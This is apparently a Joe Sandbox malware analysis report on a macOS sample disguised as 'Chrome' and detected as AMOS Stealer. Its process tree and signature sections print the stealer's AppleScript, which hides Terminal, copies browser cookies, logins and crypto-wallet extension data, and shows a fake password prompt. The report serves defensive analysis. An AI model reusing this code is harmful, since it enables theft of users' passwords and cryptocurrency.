Edit tour

macOS Analysis Report
Chrome

Overview

General Information

Sample name:	Chrome
Analysis ID:	1638499
MD5:	72676069d026c215aef39c18314a2744
SHA1:	8bbd7dc2d8721215b8606b1b0aa2c48254d0d60e
SHA256:	11317b3ba43ea9dc46d169c9b053660e184ff93a9e98eddcb349eafde3bc845c
Infos:

Detection

AMOS Stealer

Score:	52
Range:	0 - 100

Signatures

Detected AMOS Stealer

Executes Apple scripts with very long statement arguments

Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'

Executes commands using a shell command-line interpreter

Mach-O contains sections with high entropy indicating compressed/encrypted content

Reads file resource fork extended attributes

Reads the systems hostname

Sample is a FAT Mach-O sample containing binaries for multiple architectures

Sample is code signed by an ad-hoc signature

Uses AppleScript framework/components containing Apple Script related functionalities

Uses AppleScript scripting additions containing additional functionalities for Apple Scripts

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1638499
Start date and time:	2025-03-14 13:09:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Virtual Machine, Mojave (Office 16 16.27, Java 11.0.2+9, Adobe Reader 2019.010.20099)
macOS major version:	10.14
CPU architecture:	x86_64
Analysis Mode:	default
Sample name:	Chrome
Detection:	MAL
Classification:	mal52.spyw.evad.mac@0/0@0/0

Warnings

Excluded IPs from analysis (whitelisted): 104.18.38.233, 184.31.49.222, 17.253.7.132, 17.253.7.144, 17.253.7.135, 17.36.200.79, 17.253.7.134, 17.253.7.137, 184.31.52.29
Excluded domains from analysis (whitelisted): e11408.d.akamaiedge.net, lcdn-locator-usuqo.apple.com.akadns.net, updates.cdn-apple.com.akadns.net, e673.dsce9.akamaiedge.net, help-ar.apple.com.edgekey.net, crl.apple.com, ocsp.comodoca.com, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, lcdn-locator.apple.com.akadns.net, help.origin-apple.com.akadns.net, lcdn-locator.apple.com, mesu.g.aaplimg.com, updates.g.aaplimg.com, itunes.apple.com.edgekey.net, help.apple.com, init.itunes.apple.com, mesu.apple.com, updates.cdn-apple.com, init-cdn.itunes-apple.com.akadns.net

Runtime Messages

Command:	/Users/bernard/Desktop/Chrome
PID:	621
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	140:155: execution error: An error of type -1 has occurred. (-1)

Process Tree

System is macvm-mojave

xpcproxy New Fork (PID: 612, Parent: 1)

nsurlstoraged (MD5: 321b0a40e24b45f0af49ba42742b3f64) Arguments: /usr/libexec/nsurlstoraged --privileged

mono-sgen32 New Fork (PID: 621, Parent: 537)

Chrome (MD5: 72676069d026c215aef39c18314a2744) Arguments: /Users/bernard/Desktop/Chrome

sh New Fork (PID: 622, Parent: 621)

osascript (MD5: f13b7c85f3c1c08fae3b709a536281a1) Arguments: osascript -e tell application 'terminal' to set visible of the front window to false

sh New Fork (PID: 623, Parent: 621)

osascript (MD5: f13b7c85f3c1c08fae3b709a536281a1) Arguments: osascript -e set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon errorreturn 'not found'end tryend GetUUIDon firewallets(firepath, savePath)tryset fire_wallets to {{'MetaMask', 'webextension@metamask.io\\\':\\\''}}repeat with wallet in fire_walletsset uuid to GetUUID(firepath & '/prefs.js', item 2 of wallet)if uuid is not 'not found' thenset walkpath to firepath & '/storage/default/'set fileList to list folder walkpath without invisiblesrepeat with currentItem in fileListif (currentItem contains uuid) and (currentItem contains 'userContext') thenset fwallet to walkpath & currentItem & '/idb/'set fileList_wallet to list folder fwallet without invisiblesrepeat with currentItem_wallet in fileList_walletif isDirectory(fwallet & currentItem_wallet) thenGrabFolder(fwallet & currentItem_wallet, savePath & '/' & item 1 of wallet & '/')end ifend repeatend ifend repeatend ifend repeatend tryend firewalletson parseFF(browsername, firefox, writemind)tryset myFiles to {'/cookies.sqlite', '/formhistory.sqlite', '/key4.db', '/logins.json'}set fileList to list folder firefox without invisiblesrepeat with currentItem in fileListset fpath to writemind & 'gecko/' & browsername & '_' & currentItemfirewallets(firefox & currentItem, fpath)set readpath to firefox & currentItemrepeat with FFile in myFilesreadwrite(readpath & FFile, fpath & FFile)end repeatend repeatend tryend parseFFon checkvalid(username, password_entered)tryset result to do shell script 'dscl . authonly ' & quoted form of username & space & quoted form of password_enteredif result is not equal to '' thenreturn falseelsereturn trueend ifon errorreturn falseend tryend checkvalidon getpwd(username, writemind)tryif checkvalid(username, '') thenset result to do shell script 'security 2>&1 > /dev/null find-generic-password -ga \'Chrome\' | awk \'{print $2}\''writeText(result as string, writemind & 'masterpass-chrome')elserepeatset result to display dialog 'Required Application Helper. Please enter password for continue.' default answer '' with icon caution buttons {'Continue'} default button 'Continue' giving up after 150 with title 'Application wants to install helper' with hidden answerset password_entered to text returned of resultif checkvalid(username, password_entered) thenwriteText(password_entered, writemind & 'pwd')return password_enteredend ifend repeatend ifend tryreturn ''end getpwdon grabPlugins(paths, savePath, pluginList, index)tryset fileList to list folder paths without invisiblesrepeat with PFile in fileListrepeat with Plugin in pluginListif (PFile contains Plugin) thenset newpath to paths & PFileset newsavepath to savePath & '/' & Pluginif index thenset newsavepath to newsavepath & '/IndexedDB/'end ifGrabFolder(newpath, newsavepath)end ifend repeatend repeatend tryend grabPluginson chromium(writemind, chromium_map)set pluginList to {'ldinpeekobnhjjdofggfgjlcehhmanlj', 'nphplpgoakhhjchkkhmiggakijnkhfnd', 'jbkgjmpfammbgejcpedggoefddacbdia', 'fccgmnglbhajioalokbcidhcaikhlcpm', 'nebnhfamliijlghikdgcigoebonmoibm', 'fdcnegogpncmfejlfnffnofpngdiejii', 'mfhbebgoclkghebffdldpobeajmbecfk', 'ffbceckpkpbcmgiaehlloocglmijnpmp', 'kfdniefadaanbjodldohaedphafoffoh', 'bedogdpgdnifilpgeianmmdabklhfkcn', 'kpfchfdkjhcoekhdldggegebfakaaiog', 'klnaejjgbibmhlephnhpmaofohgkpgkd', 'opcgpfmipidbgpenhmajoajpbobppdil', 'mmmjbcfofconkannjonfmjjajpllddbg', 'modjfdjcodmehnpccdjngmdfajggaoeh', 'dkdedlpgdmmkkfjabffeganieamfklkm', 'ifclboecfhkjbpmhgehodcjpciihhmif', 'ppbibelpcjmhbdihakflkdcoccbgbkpo', 'ejjladinnckdgjemekebdpeokbikhfci', 'kkpllkodjeloidieedojogacfhpaihoh', 'apnehcjmnengpnmccpaibjmhhoadaico', 'jiepnaheligkibgcjgjepjfppgbcghmp', 'jojhfeoedkpkglbfimdfabpdfjaoolaf', 'idpdilbfamoopcfofbipefhmmnflljfi', 'lbjapbcmmceacocpimbpbidpgmlmoaao', 'oiohdnannmknmdlddkdejbmplhbdcbee', 'fldfpgipfncgndfolcbkdeeknbbbnhcc', 'fpkhgmpbidmiogeglndfbkegfdlnajnf', 'lgmpcpglpngdoalbgeoldeajfclnhafa', 'ilhaljfiglknggcoegeknjghdgampffk', 'pfccjkejcgoppjnllalolplgogenfojk', 'cnmamaachppnkjgnildpdmkaakejnhae', 'eajafomhmkipbjmfmhebemolkcicgfmd', 'emeeapjkbcbpbpgaagfchmcgglmebnen', 'ibnejdfjmmkpcnlpebklmnkoeoihofec', 'hifafgmccdpekplomjjkcfgodnhcellj', 'ffnbelfdoeiohenkjibnmadjiehjhajb', 'fnjhmkhhmkbjkkabndcnnogagogbneec', 'bcopgchhojmggmffilplmbdicgaihlkp', 'cmoakldedjfnjofgbbfenefcagmedlga', 'ifckdpamphokdglkkdomedpdegcjhjdp', 'ibljocddagjghmlpgihahamcghfggcjc', 'cjmkndjhnagcfbpiemnkdpomccnjblmj', 'kbdcddcmgoplfockflacnnefaehaiocb', 'cgeeodpfagjceefieflmdfphplkenlfk', 'afbcbjpbpfadlkmhmclhkeeodmamcflc', 'fdchdcpieegfofnofhgdombfckhbcokj', 'gjlmehlldlphhljhpnlddaodbjjcchai', 'ellkdbaphhldpeajbepobaecooaoafpg', 'ojbcfhjmpigfobfclfflafhblgemeidi', 'ghlmndacnhlaekppcllcpcjjjomjkjpg', 'kgdijkcfiglijhaglibaidbipiejjfdp', 'abkahkcbhngaebpcgfmhkoioedceoigp', 'ammjlinfekkoockogfhdkgcohjlbhmff', 'pdliaogehgdbhbnmkklieghmmjkpigpa', 'jnlgamecbpmbajjfhmmmlhejkemejdma', 'nbdhibgjnjpnkajaghbffjbkcgljfgdi', 'jfdlamikmbghhapbgfoogdffldioobgl', 'fijngjgcjhjmmpcmkeiomlglpeiijkld', 'hgbeiipamcgbdjhfflifkgehomnmglgk', 'pmmnimefaichbcnbndcfpaagbepnjaig', 'cflgahhmjlmnjbikhakapcfkpbcmllam', 'keenhcnmdmjjhincpilijphpiohdppno', 'bipdhagncpgaccgdbddmbpcabgjikfkn', 'bcenedbpaaegpnijoadpdjiachahncdg', 'pocmplpaccanhmnllbbkpgfliimjljgo', 'klghhnkeealcohjjanjjdaeeggmfmlpl', 'cjookpbkjnpkmknedggeecikaponcalb', 'ojggmchlghnjlapmfbnjholfjkiidbch', 'dngmlblcodfobpdpecaadgfbcggfjfnm', 'jnldfbidonfeldmalbflbmlebbipcnle', 'ehjiblpccbknkgimiflboggcffmpphhp', 'agoakfejjabomempkjlepdflaleeobhb', 'fopmedgnkfpebgllppeddmmochcookhc', 'dmkamcknogkgcdfhhbddcghachkejeap', 'iglbgmakmggfkoidiagnhknlndljlolb', 'opfgelmcmbiajamepnmloijbpoleiama', 'gkeelndblnomfmjnophbhfhcjbcnemka', 'dgiehkgfknklegdhekgeabnhgfjhbajd', 'gafhhkghbfjjkeiendhlofajokpaflmk', 'imlcamfeniaidioeflifonfjeeppblda', 'penjlddjkjgpnkllboccdgccekpkcbin', 'nhnkbkgjikgcigadomkphalanndcapjk', 'egjidjbpglichdcondbcbdnbeeppgdph', 'dlcobpjiigpikoobohmabehhmhfoodbb', 'dldjpboieedgcmpkchcjcbijingjcgok', 'acmacodkjbdgmoleebolmdjonilkdbch', 'lccbohhgfkdikahanoclbdmaolidjdfl', 'pcndjhkinnkaohffealmlmhaepkpmgkb', 'gjagmgiddbbciopjhllkdnddhcglnemk', 'cnncmdhjacpkmjmkcafchppbnpnhdmon', 'mfgccjchihfkkindfppnaooecgfneiii', 'ieldiilncjhfkalnemgjbffmpomcaigi', 'ckklhkaabbmdjkahiaaplikpdddkenic', 'loinekcabhlmhjjbocijdoimmejangoa', 'mgffkfbidihjpoaomajlbgchddlicgpn', 'pnndplcbkakcplkjnolgbkdgjikjednm', 'mcohilncbfahbmgdjkbpemcciiolgcge', 'bgpipimickeadkjlklgciifhnalhdjhe', 'pdadjkfkgcafgbceimcpbkalnfnepbnk', 'jiidiaalihmmhddjgbnbgdfflelocpak', 'aeachknmefphepccionboohckonoeemg', 'gdokollfhmnbfckbobkdbakhilldkhcj', 'jiiigigdinhhgjflhljdkcelcjfmplnd', 'kmphdnilpmdejikjdnlbcnmnabepfgkh', 'jaooiolkmfcmloonphpiiogkfckgciom', 'fcckkdbjnoikooededlapcalpionmalo', 'mdnaglckomeedfbogeajfajofmfgpoae', 'ebfidpplhabeedpnhjnobghokpiioolj', 'dbgnhckhnppddckangcjbkjnlddbjkna', 'cpmkedoipcpimgecpmgpldfpohjplkpp', 'epapihdplajcdnnkdeiahlgigofloibg', 'iokeahhehimjnekafflcihljlcjccdbe', 'cihmoadaighcejopammfbmddcmdekcje', 'hnfanknocfeofbddgcijnmhnfnkdnaad', 'kilnpioakcdndlodeeceffgjdpojajlo', 'abogmiocnneedmmepnohnhlijcjpcifd', 'bofddndhbegljegmpmnlbhcejofmjgbn', 'aholpfdialjgjfhomihkjbmgjidlcdno', 'hdkobeeifhdplocklknbnejdelgagbao', 'oafedfoadhdjjcipmcbecikgokpaphjk', 'bfnaelmomeimhlpmgjnjophhpkkoljpa', 'nkbihfbeogaeaoehlefnkodbefgpgknn', 'lfmmjkfllhmfmkcobchabopkcefjkoip', '

xpcproxy New Fork (PID: 641, Parent: 1)

eficheck (MD5: 328beb81a2263449258057506bb4987f) Arguments: /usr/libexec/firmwarecheckers/eficheck/eficheck --integrity-check-daemon

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 17.248.195.72:443 -> 192.168.11.12:49348 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 17.253.7.136:443 -> 192.168.11.12:49351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49395 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49400 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 151.101.67.6
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.248.195.72
Source: unknown	TCP traffic detected without corresponding DNS query: 17.253.7.136

Source: Chrome, 00000621.00000258.1.000000010da34000.000000010da5d000.r--.sdmp	String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: Chrome, 00000621.00000258.1.000000010da34000.000000010da5d000.r--.sdmp	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: Chrome, 00000621.00000258.1.000000010da34000.000000010da5d000.r--.sdmp	String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: Chrome, 00000621.00000258.1.000000010da34000.000000010da5d000.r--.sdmp	String found in binary or memory: http://www.apple.com/certificateauthority0
Source: Chrome, 00000621.00000258.1.000000010da34000.000000010da5d000.r--.sdmp	String found in binary or memory: https://www.apple.com/appleca/0

Source: unknown	Network traffic detected: HTTP traffic on port 49351 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49348
Source: unknown	Network traffic detected: HTTP traffic on port 49352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49400
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49351
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49395
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49350
Source: unknown	Network traffic detected: HTTP traffic on port 49393 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49394
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49393
Source: unknown	Network traffic detected: HTTP traffic on port 49395 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49392
Source: unknown	Network traffic detected: HTTP traffic on port 49391 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49391
Source: unknown	Network traffic detected: HTTP traffic on port 49396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49348 -> 443

Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 17.248.195.72:443 -> 192.168.11.12:49348 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 17.253.7.136:443 -> 192.168.11.12:49351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.67.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49391 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49392 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49393 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49394 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49395 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49396 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49400 version: TLS 1.2

Source: classification engine

Classification label: mal52.spyw.evad.mac@0/0@0/0

Persistence and Installation Behavior

Executes Apple scripts with very long statement arguments

Source: /bin/sh (PID: 623)

Osascript command executed: osascript -e set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon errorr

Jump to behavior

Source: /bin/sh (PID: 622)	Osascript command executed: osascript -e tell application 'terminal' to set visible of the front window to false			Jump to behavior
Source: /bin/sh (PID: 623)	Osascript command executed: osascript -e set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset endpos to offset of '\\' in uuidif endpos is 0 thenreturn 'not found'end ifset realuuid to text uuidStart thru (uuidStart + endpos - 2) of fileContentsreturn realuuidon errorr			Jump to behavior

Source: /Users/bernard/Desktop/Chrome (PID: 621)	Shell command executed: sh -c osascript -e 'tell application 'terminal' to set visible of the front window to false'			Jump to behavior
Source: /Users/bernard/Desktop/Chrome (PID: 621)	Shell command executed: sh -c osascript -e 'set username to (system attribute 'USER')if username is 'maria' or username is 'jackiemac' or username is 'root' or username is 'run' then error number -1set release to trueset filegrabbers to trueon mkdir(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)do shell script 'mkdir -p ' & filePosixPathend tryend mkdiron FileName(filePath)tryset reversedPath to (reverse of every character of filePath) as stringset trimmedPath to text 1 thru ((offset of '/' in reversedPath) - 1) of reversedPathset finalPath to (reverse of every character of trimmedPath) as stringreturn finalPathend tryreturn ''end FileNameon BeforeFileName(filePath)tryset lastSlash to offset of '/' in (reverse of every character of filePath) as stringset trimmedPath to text 1 thru -(lastSlash + 1) of filePathreturn trimmedPathend tryreturn ''end BeforeFileNameon writeText(textToWrite, filePath)tryset folderPath to BeforeFileName(filePath)mkdir(folderPath)set fileRef to (open for access filePath with write permission)set eof of fileRef to 0write textToWrite to fileRef starting at eofclose access fileRefend tryend writeTexton readwrite(path_to_file, path_as_save)tryset fileContent to read path_to_fileset folderPath to BeforeFileName(path_as_save)mkdir(folderPath)do shell script 'cat ' & quoted form of path_to_file & ' > ' & quoted form of path_as_saveend tryend readwriteon isDirectory(someItem)tryset filePosixPath to quoted form of (POSIX path of someItem)set fileType to (do shell script 'file -b ' & filePosixPath)if fileType ends with 'directory' thenreturn trueend ifend tryreturn falseend isDirectoryon GrabFolder(sourceFolder, destinationFolder)tryset exceptionsList to {'.DS_Store', 'Partitions', 'Code Cache', 'Cache', 'market-history-cache.json', 'journals', 'Previews', 'GPUCache', 'DawnCache', 'Crashpad', 'DawnWebGPUCache', 'DawnGraphiteCache'}set fileList to list folder sourceFolder without invisiblesmkdir(destinationFolder)repeat with currentItem in fileListif currentItem is not in exceptionsList thenset itemPath to sourceFolder & '/' & currentItemset savePath to destinationFolder & '/' & currentItemif isDirectory(itemPath) thenGrabFolder(itemPath, savePath)elsereadwrite(itemPath, savePath)end ifend ifend repeatend tryend GrabFolderon GetUUID(pather, searchString)tryset theFile to POSIX file patherset fileContents to read theFileset startPos to offset of searchString in fileContentsif startPos is 0 thenreturn 'not found'end ifset uuidStart to startPos + (length of searchString)set uuid to text uuidStart thru (uuidStart + 55) of fileContentsset 